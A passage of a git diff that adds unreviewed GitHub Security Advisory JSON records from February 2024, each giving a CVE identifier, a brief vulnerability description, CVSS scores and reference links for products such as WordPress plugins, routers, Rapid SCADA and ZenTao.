+ "type": "WEB",
+ "url": "http://solar-log.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T02:15:16Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9hq7-63hh-f94f/GHSA-9hq7-63hh-f94f.json b/advisories/unreviewed/2024/02/GHSA-9hq7-63hh-f94f/GHSA-9hq7-63hh-f94f.json
new file mode 100644
index 0000000000000..8e623eb29e148
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9hq7-63hh-f94f/GHSA-9hq7-63hh-f94f.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9hq7-63hh-f94f",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0701"
+ ],
+ "details": "The UserPro plugin for WordPress is vulnerable to Security Feature Bypass in all versions up to, and including, 5.1.6. This is due to the use of client-side restrictions to enforce the 'Disabled registration' Membership feature within the plugin's General settings. This makes it possible for unauthenticated attackers to register an account even when account registration has been disabled by an administrator.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0701"
+ },
+ {
+ "type": "WEB",
+ "url": "https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9jg2-gggf-jv4g/GHSA-9jg2-gggf-jv4g.json b/advisories/unreviewed/2024/02/GHSA-9jg2-gggf-jv4g/GHSA-9jg2-gggf-jv4g.json
new file mode 100644
index 0000000000000..61114a0c3ed98
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9jg2-gggf-jv4g/GHSA-9jg2-gggf-jv4g.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9jg2-gggf-jv4g",
+ "modified": "2024-02-07T03:30:32Z",
+ "published": "2024-02-07T03:30:32Z",
+ "aliases": [
+ "CVE-2024-1266"
+ ],
+ "details": "A vulnerability classified as problematic was found in CodeAstro University Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /st_reg.php of the component Student Registration Form. The manipulation of the argument Address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-253009 was assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1266"
+ },
+ {
+ "type": "WEB",
+ "url": "https://drive.google.com/file/d/16a9lQqUFBICw-Hhbe9bT5sSB7qwZjMwA/view?usp=sharing"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.253009"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.253009"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T01:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9jpc-6xx4-mc82/GHSA-9jpc-6xx4-mc82.json b/advisories/unreviewed/2024/02/GHSA-9jpc-6xx4-mc82/GHSA-9jpc-6xx4-mc82.json
new file mode 100644
index 0000000000000..89664de48387d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9jpc-6xx4-mc82/GHSA-9jpc-6xx4-mc82.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9jpc-6xx4-mc82",
+ "modified": "2024-02-08T00:32:18Z",
+ "published": "2024-02-05T09:30:28Z",
+ "aliases": [
+ "CVE-2024-24848"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MJS Software PT Sign Ups – Beautiful volunteer sign ups and management made easy allows Stored XSS.This issue affects PT Sign Ups – Beautiful volunteer sign ups and management made easy: from n/a through 1.0.4.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24848"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/ptoffice-sign-ups/wordpress-pt-sign-ups-plugin-1-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T07:15:13Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9jx4-4hmg-8h59/GHSA-9jx4-4hmg-8h59.json b/advisories/unreviewed/2024/02/GHSA-9jx4-4hmg-8h59/GHSA-9jx4-4hmg-8h59.json
new file mode 100644
index 0000000000000..deebae5cba541
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9jx4-4hmg-8h59/GHSA-9jx4-4hmg-8h59.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9jx4-4hmg-8h59",
+ "modified": "2024-02-04T21:30:44Z",
+ "published": "2024-02-04T21:30:44Z",
+ "aliases": [
+ "CVE-2021-46902"
+ ],
+ "details": "An issue was discovered in LTOS-Web-Interface in Meinberg LANTIME-Firmware before 6.24.029 MBGID-9343 and 7 before 7.04.008 MBGID-6303. Path validation is mishandled, and thus an admin can read or delete files in violation of expected access controls.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46902"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.meinberg.de/german/news/meinberg-security-advisory-mbgsa-2021-03-meinberg-lantime-firmware-v7-04-008-und-v6-24-029.htm"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-04T21:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9mhj-hrp8-v2xc/GHSA-9mhj-hrp8-v2xc.json b/advisories/unreviewed/2024/02/GHSA-9mhj-hrp8-v2xc/GHSA-9mhj-hrp8-v2xc.json
new file mode 100644
index 0000000000000..05c49f5b56900
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9mhj-hrp8-v2xc/GHSA-9mhj-hrp8-v2xc.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9mhj-hrp8-v2xc",
+ "modified": "2024-02-02T09:30:22Z",
+ "published": "2024-02-02T09:30:22Z",
+ "aliases": [
+ "CVE-2024-23978"
+ ],
+ "details": "Heap-based buffer overflow vulnerability exists in HOME SPOT CUBE2 V102 and earlier. By processing invalid values, arbitrary code may be executed. Note that the affected products are no longer supported.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23978"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jvn.jp/en/vu/JVNVU93740658/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.au.com/support/service/mobile/guide/wlan/home_spot_cube_2/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T07:15:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9pp3-66w8-j42c/GHSA-9pp3-66w8-j42c.json b/advisories/unreviewed/2024/02/GHSA-9pp3-66w8-j42c/GHSA-9pp3-66w8-j42c.json
new file mode 100644
index 0000000000000..8f1c92712e6e1
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9pp3-66w8-j42c/GHSA-9pp3-66w8-j42c.json
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9pp3-66w8-j42c",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2024-23746"
+ ],
+ "details": "Miro Desktop 0.8.18 on macOS allows Electron code injection.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23746"
+ },
+ {
+ "type": "WEB",
+ "url": "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/louiselalanne/CVE-2024-23746"
+ },
+ {
+ "type": "WEB",
+ "url": "https://miro.com/about/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T02:15:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9px9-grv9-rcf6/GHSA-9px9-grv9-rcf6.json b/advisories/unreviewed/2024/02/GHSA-9px9-grv9-rcf6/GHSA-9px9-grv9-rcf6.json
new file mode 100644
index 0000000000000..ab7d8b4a0a605
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9px9-grv9-rcf6/GHSA-9px9-grv9-rcf6.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9px9-grv9-rcf6",
+ "modified": "2024-02-03T18:30:20Z",
+ "published": "2024-02-03T18:30:20Z",
+ "aliases": [
+ "CVE-2024-1215"
+ ],
+ "details": "A vulnerability was found in SourceCodester CRUD without Page Reload 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file fetch_data.php. The manipulation of the argument username/city leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252782 is the identifier assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1215"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/PrecursorYork/crud-without-refresh-reload-Reflected_XSS-POC/blob/main/README.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252782"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252782"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-03T16:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9rvg-5948-h2q2/GHSA-9rvg-5948-h2q2.json b/advisories/unreviewed/2024/02/GHSA-9rvg-5948-h2q2/GHSA-9rvg-5948-h2q2.json
new file mode 100644
index 0000000000000..5cb756fcc4c4e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9rvg-5948-h2q2/GHSA-9rvg-5948-h2q2.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9rvg-5948-h2q2",
+ "modified": "2024-02-06T12:30:31Z",
+ "published": "2024-02-06T12:30:31Z",
+ "aliases": [
+ "CVE-2024-24937"
+ ],
+ "details": "In JetBrains TeamCity before 2023.11.2 stored XSS via agent distribution was possible",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24937"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jetbrains.com/privacy-security/issues-fixed/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T10:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9v8v-3rjq-7h4r/GHSA-9v8v-3rjq-7h4r.json b/advisories/unreviewed/2024/02/GHSA-9v8v-3rjq-7h4r/GHSA-9v8v-3rjq-7h4r.json
new file mode 100644
index 0000000000000..2a9738d21c352
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9v8v-3rjq-7h4r/GHSA-9v8v-3rjq-7h4r.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9v8v-3rjq-7h4r",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-02T00:31:27Z",
+ "aliases": [
+ "CVE-2024-21852"
+ ],
+ "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can supply a malicious configuration file by utilizing a Zip Slip vulnerability in the unpacking routine to achieve remote code execution.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21852"
+ },
+ {
+ "type": "WEB",
+ "url": "https://rapidscada.org/contact/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T23:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9w2r-p3qj-g3gm/GHSA-9w2r-p3qj-g3gm.json b/advisories/unreviewed/2024/02/GHSA-9w2r-p3qj-g3gm/GHSA-9w2r-p3qj-g3gm.json
new file mode 100644
index 0000000000000..586f17d17de43
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9w2r-p3qj-g3gm/GHSA-9w2r-p3qj-g3gm.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9w2r-p3qj-g3gm",
+ "modified": "2024-02-06T06:30:32Z",
+ "published": "2024-02-06T06:30:32Z",
+ "aliases": [
+ "CVE-2023-43532"
+ ],
+ "details": "Memory corruption while reading ACPI config through the user mode app.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43532"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-763"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9wxq-v2f6-8h7g/GHSA-9wxq-v2f6-8h7g.json b/advisories/unreviewed/2024/02/GHSA-9wxq-v2f6-8h7g/GHSA-9wxq-v2f6-8h7g.json
new file mode 100644
index 0000000000000..1c0c4fdc833b7
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9wxq-v2f6-8h7g/GHSA-9wxq-v2f6-8h7g.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9wxq-v2f6-8h7g",
+ "modified": "2024-02-05T21:30:31Z",
+ "published": "2024-02-05T21:30:31Z",
+ "aliases": [
+ "CVE-2024-24543"
+ ],
+ "details": "Buffer Overflow vulnerability in the function setSchedWifi in Tenda AC9 v.3.0, firmware version v.15.03.06.42_multi allows a remote attacker to cause a denial of service or run arbitrary code via crafted overflow data.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24543"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0130/setSchedWifi.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T21:15:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-c3c7-9cj5-pr3c/GHSA-c3c7-9cj5-pr3c.json b/advisories/unreviewed/2024/02/GHSA-c3c7-9cj5-pr3c/GHSA-c3c7-9cj5-pr3c.json
new file mode 100644
index 0000000000000..9827e9b7bd0c5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-c3c7-9cj5-pr3c/GHSA-c3c7-9cj5-pr3c.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c3c7-9cj5-pr3c",
+ "modified": "2024-02-07T18:30:26Z",
+ "published": "2024-02-01T12:30:22Z",
+ "aliases": [
+ "CVE-2023-51536"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CRM Perks CRM Perks Forms – WordPress Form Builder allows Stored XSS.This issue affects CRM Perks Forms – WordPress Form Builder: from n/a through 1.1.2.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51536"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/crm-perks-forms/wordpress-crm-perks-forms-plugin-1-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T11:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-c493-5mp7-c24q/GHSA-c493-5mp7-c24q.json b/advisories/unreviewed/2024/02/GHSA-c493-5mp7-c24q/GHSA-c493-5mp7-c24q.json
new file mode 100644
index 0000000000000..fb5276b4c6330
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-c493-5mp7-c24q/GHSA-c493-5mp7-c24q.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c493-5mp7-c24q",
+ "modified": "2024-02-08T06:30:23Z",
+ "published": "2024-02-08T06:30:23Z",
+ "aliases": [
+ "CVE-2024-24202"
+ ],
+ "details": "An arbitrary file upload vulnerability in /upgrade/control.php of ZenTao Community Edition v18.10, ZenTao Biz v8.10, and ZenTao Max v4.10 allows attackers to execute arbitrary code via uploading a crafted .txt file.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24202"
+ },
+ {
+ "type": "WEB",
+ "url": "https://clammy-blizzard-8ef.notion.site/Zentao-PMS-Authorized-Remote-Code-Execution-Vulnerability-1077a870c92848e18fe0c139c4fc2176"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T05:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-c4c9-rwvw-5wrf/GHSA-c4c9-rwvw-5wrf.json b/advisories/unreviewed/2024/02/GHSA-c4c9-rwvw-5wrf/GHSA-c4c9-rwvw-5wrf.json
new file mode 100644
index 0000000000000..b8411bf5b29e1
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-c4c9-rwvw-5wrf/GHSA-c4c9-rwvw-5wrf.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c4c9-rwvw-5wrf",
+ "modified": "2024-02-05T09:30:28Z",
+ "published": "2024-02-05T09:30:28Z",
+ "aliases": [
+ "CVE-2024-22386"
+ ],
+ "details": "A race condition was found in the Linux kernel's drm/exynos device driver in exynos_drm_crtc_atomic_disable() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22386"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8147"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-362"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T08:15:43Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-c56q-fqmf-hg57/GHSA-c56q-fqmf-hg57.json b/advisories/unreviewed/2024/02/GHSA-c56q-fqmf-hg57/GHSA-c56q-fqmf-hg57.json
new file mode 100644
index 0000000000000..f5bc7ff80254f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-c56q-fqmf-hg57/GHSA-c56q-fqmf-hg57.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c56q-fqmf-hg57",
+ "modified": "2024-02-01T06:31:05Z",
+ "published": "2024-02-01T06:31:05Z",
+ "aliases": [
+ "CVE-2023-7069"
+ ],
+ "details": "The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2023.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7069"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027702%40advanced-iframe&new=3027702%40advanced-iframe&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2e32c51d-2d96-4545-956f-64f65c54b33b?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T04:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-c5g4-g3x7-x8rm/GHSA-c5g4-g3x7-x8rm.json b/advisories/unreviewed/2024/02/GHSA-c5g4-g3x7-x8rm/GHSA-c5g4-g3x7-x8rm.json
new file mode 100644
index 0000000000000..bdc012d81a91a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-c5g4-g3x7-x8rm/GHSA-c5g4-g3x7-x8rm.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c5g4-g3x7-x8rm",
+ "modified": "2024-02-06T03:32:59Z",
+ "published": "2024-02-06T03:32:59Z",
+ "aliases": [
+ "CVE-2023-47353"
+ ],
+ "details": "An issue in the com.oneed.dvr.service.DownloadFirmwareService component of IMOU GO v1.0.11 allows attackers to force the download of arbitrary files.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47353"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/actuator/imou/blob/main/com.dahua.imou.go-V1.0.11.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://play.google.com/store/apps/details?id=com.dahua.imou.go"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-c6f2-5665-5p8p/GHSA-c6f2-5665-5p8p.json b/advisories/unreviewed/2024/02/GHSA-c6f2-5665-5p8p/GHSA-c6f2-5665-5p8p.json
new file mode 100644
index 0000000000000..274f6e20111ac
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-c6f2-5665-5p8p/GHSA-c6f2-5665-5p8p.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c6f2-5665-5p8p",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-22773"
+ ],
+ "details": "Intelbras Roteador ACtion RF 1200 1.2.2 esposes the Password in Cookie resulting in Login Bypass.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22773"
+ },
+ {
+ "type": "WEB",
+ "url": "https://medium.com/%40wagneralves_87750/poc-cve-2024-22773-febf0d3a5433"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.youtube.com/watch?v=-r0TWJq55DU&t=7s"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T01:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-c7rp-5prq-c624/GHSA-c7rp-5prq-c624.json b/advisories/unreviewed/2024/02/GHSA-c7rp-5prq-c624/GHSA-c7rp-5prq-c624.json
new file mode 100644
index 0000000000000..af79d385f3e87
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-c7rp-5prq-c624/GHSA-c7rp-5prq-c624.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c7rp-5prq-c624",
+ "modified": "2024-02-02T18:30:30Z",
+ "published": "2024-02-02T18:30:30Z",
+ "aliases": [
+ "CVE-2021-21575"
+ ],
+ "details": "\nDell BSAFE Micro Edition Suite, versions before 4.5.2, contain an Observable Timing Discrepancy Vulnerability.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21575"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dell.com/support/kbdoc/en-us/000189462/dsa-2021-131-dell-bsafetm-micro-edition-suite-multiple-vulnerabilities"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-208"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-c866-8gpw-p3mv/GHSA-c866-8gpw-p3mv.json b/advisories/unreviewed/2024/02/GHSA-c866-8gpw-p3mv/GHSA-c866-8gpw-p3mv.json
new file mode 100644
index 0000000000000..81e6fd8262961
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-c866-8gpw-p3mv/GHSA-c866-8gpw-p3mv.json
